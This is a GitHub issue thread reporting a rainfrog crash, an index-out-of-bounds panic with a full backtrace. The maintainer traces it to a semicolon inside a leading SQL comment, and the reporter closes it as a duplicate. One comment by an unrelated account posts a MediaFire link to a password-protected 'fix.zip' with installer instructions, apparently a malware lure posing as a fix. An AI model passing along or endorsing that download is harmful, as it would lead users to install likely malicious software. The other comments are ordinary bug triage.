### ISSUE TITLE
Crash Report

### ISSUE THREAD

**Issue by tjweir** [achristmascarl/rainfrog#46]
name = "rainfrog"
operating_system = "Mac OS 14.6.1 [64-bit]"
crate_version = "0.1.12"
explanation = """
Panic occurred in file 'src/database.rs' at line 140
"""
cause = "index out of bounds: the len is 0 but the index is 0"
method = "Panic"
backtrace = """

   0: 0x1012cb600 - core::panicking::panic_fmt::he22466887efdf1d5
   1: 0x1012cb77c - core::panicking::panic_bounds_check::h2e36cc48ec80c99e
   2: 0x100c98a64 - rainfrog::database::should_use_tx::h63e553b4256700e4
   3: 0x100c090c0 - rainfrog::app::App::run::{{closure}}::{{closure}}::ha0478c6505e5f947
   4: 0x100bfc420 - tokio::runtime::task::core::Core<T,S>::poll::h7419f0cf72c65589
   5: 0x100c778d4 - tokio::runtime::task::harness::Harness<T,S>::poll::h187471fc6c6570e0
   6: 0x100f34074 - tokio::runtime::scheduler::multi_thread::worker::Context::run_task::h77437fd625c9d847
   7: 0x100f32f98 - tokio::runtime::scheduler::multi_thread::worker::Context::run::hfa4151b07d0658ce
   8: 0x100f36d10 - tokio::runtime::context::runtime::enter_runtime::h52492ae13d985528
   9: 0x100f32afc - tokio::runtime::scheduler::multi_thread::worker::run::h97429d61333adc17
  10: 0x100f424ec - tokio::runtime::task::core::Core<T,S>::poll::h7a5795830bf541d1
  11: 0x100f226a8 - tokio::runtime::task::harness::Harness<T,S>::poll::h610f65f1ff84c0a3
  12: 0x100f25adc - tokio::runtime::blocking::pool::Inner::run::hc623579bfa5eb581
  13: 0x100f42e04 - std::sys::backtrace::__rust_begin_short_backtrace::h42aff85751f1f775
  14: 0x100f3b820 - core::ops::function::FnOnce::call_once{{vtable.shim}}::h85d2cb21bdaeb412
  15: 0x101282fdc - std::sys::pal::unix::thread::Thread::new::thread_start::h1464447dee17c73c
  16: 0x1930d1f94 - __pthread_joiner_wake"""

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tjweir** [comment]
Is this better here, or in an email?

**Comment by achristmascarl** [comment]
thanks @tjweir, github issues is good. did this happen on startup or after running a specific query?

**Comment by tjweir** [comment]
Yes, I had something like this in the query editor.

```
-- select * from table1;
select * from table1 where x = 1;

```

**Comment by achristmascarl** [comment]
ah it's quite similar to https://github.com/achristmascarl/rainfrog/issues/32, because of the semi-colon in the comment. i'll fix it in the next release, in the meantime you'll need to remove comments from the top of the query 🙏

**Comment by tjweir** [comment]
"in the meantime you'll need to remove comments from the top of the query"

Don't boss me around!  :)

Sounds good, shall I close in favour of #32?

**Comment by achristmascarl** [comment]
> Sounds good, shall I close in favour of #32?

yep that works! thanks

**Comment by tjweir** [comment]
Closed as dupe of #32
